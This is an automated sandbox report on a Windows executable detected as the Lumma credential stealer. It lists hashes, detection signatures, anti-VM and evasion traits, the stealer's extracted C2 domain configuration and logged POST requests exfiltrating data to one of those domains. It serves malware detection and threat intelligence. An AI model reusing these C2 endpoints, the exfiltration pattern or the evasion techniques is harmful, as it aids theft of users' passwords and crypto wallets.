Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Upd v1.1.0.exe

Overview

General Information

Sample name:New Upd v1.1.0.exe
Analysis ID:1581509
MD5:3bdf3c4f1cfbb40a395ec5b10d97faf3
SHA1:a8d14eccdc6693375a7e22d4cf8677c6a90f9ec4
SHA256:a9748e3079e5e53cafe8a6251de92016f906d9e2c4e8d3835c641eb0de7c0edb
Tags:exeLummaStealersigneduser-ventoy
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Detected potential crypto function
Entry point lies outside standard sections
Found evasive API chain (date check)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • New Upd v1.1.0.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\New Upd v1.1.0.exe" MD5: 3BDF3C4F1CFBB40A395EC5B10D97FAF3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["inherineau.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "begguinnerz.biz", "hummskitnj.buzz", "rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--3fe7f419a360"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x4eace:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        • 0x52064:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: New Upd v1.1.0.exe PID: 7576JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Click to see the 2 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:21:12.914580+010020283713Unknown Traffic192.168.2.449737104.21.92.91443TCP
              2024-12-27T23:21:14.966012+010020283713Unknown Traffic192.168.2.449738104.21.92.91443TCP
              2024-12-27T23:21:17.354345+010020283713Unknown Traffic192.168.2.449739104.21.92.91443TCP
              2024-12-27T23:21:19.657247+010020283713Unknown Traffic192.168.2.449741104.21.92.91443TCP
              2024-12-27T23:21:21.993137+010020283713Unknown Traffic192.168.2.449742104.21.92.91443TCP
              2024-12-27T23:21:24.590051+010020283713Unknown Traffic192.168.2.449743104.21.92.91443TCP
              2024-12-27T23:21:26.693770+010020283713Unknown Traffic192.168.2.449744104.21.92.91443TCP
              2024-12-27T23:21:29.343796+010020283713Unknown Traffic192.168.2.449745104.21.92.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:21:13.648235+010020546531A Network Trojan was detected192.168.2.449737104.21.92.91443TCP
              2024-12-27T23:21:15.745621+010020546531A Network Trojan was detected192.168.2.449738104.21.92.91443TCP
              2024-12-27T23:21:30.111486+010020546531A Network Trojan was detected192.168.2.449745104.21.92.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:21:13.648235+010020498361A Network Trojan was detected192.168.2.449737104.21.92.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:21:15.745621+010020498121A Network Trojan was detected192.168.2.449738104.21.92.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:21:27.993028+010020480941Malware Command and Control Activity Detected192.168.2.449744104.21.92.91443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://begguinnerz.biz/piAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz:443/apioQAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/UAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/ymAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/apiamAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/Avira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/AnAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/1nerAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz:443/apin.txtPKAvira URL Cloud: Label: malware
              Source: begguinnerz.bizAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/api19Avira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/apisAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/pianAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/QmAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/asAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/apillAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/apiAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz/piYnAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz:443/apiAvira URL Cloud: Label: malware
              Source: https://begguinnerz.biz:443/apiLQAvira URL Cloud: Label: malware
              Source: New Upd v1.1.0.exe.7576.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["inherineau.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "begguinnerz.biz", "hummskitnj.buzz", "rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--3fe7f419a360"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
              Source: New Upd v1.1.0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49745 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49744 -> 104.21.92.91:443
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: begguinnerz.biz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.92.91:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.92.91:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: begguinnerz.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HCC3PJ4LT1SPICR26User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: begguinnerz.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PK480VEB774OH2B8VBQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8797Host: begguinnerz.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=17SJPFTN8QWCKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20414Host: begguinnerz.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PMPBSEGZ713PIJG3D2DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1267Host: begguinnerz.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VSLUPTMYCJK38LQB5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1113Host: begguinnerz.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: begguinnerz.biz
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: begguinnerz.biz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
              Source: New Upd v1.1.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: New Upd v1.1.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: New Upd v1.1.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: New Upd v1.1.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: New Upd v1.1.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1957041720.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: New Upd v1.1.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: New Upd v1.1.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: New Upd v1.1.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: New Upd v1.1.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: New Upd v1.1.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: New Upd v1.1.0.exeString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: New Upd v1.1.0.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: New Upd v1.1.0.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: New Upd v1.1.0.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: New Upd v1.1.0.exeString found in binary or memory: http://ocsp.digicert.com0W
              Source: New Upd v1.1.0.exeString found in binary or memory: http://ocsp.digicert.com0X
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: New Upd v1.1.0.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/
              Source: New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/1ner
              Source: New Upd v1.1.0.exe, 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888266882.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/An
              Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/Qm
              Source: New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/U
              Source: New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/api
              Source: New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/api19
              Source: New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/apiam
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/apill
              Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/apis
              Source: New Upd v1.1.0.exe, 00000000.00000003.1838881668.000000000399F000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839511974.000000000399A000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838829498.000000000399C000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838777067.0000000003996000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839281599.000000000399A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/as
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/pi
              Source: New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/piYn
              Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/pian
              Source: New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/ym
              Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/api
              Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/apiLQ
              Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/apin.txtPK
              Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/apioQ
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
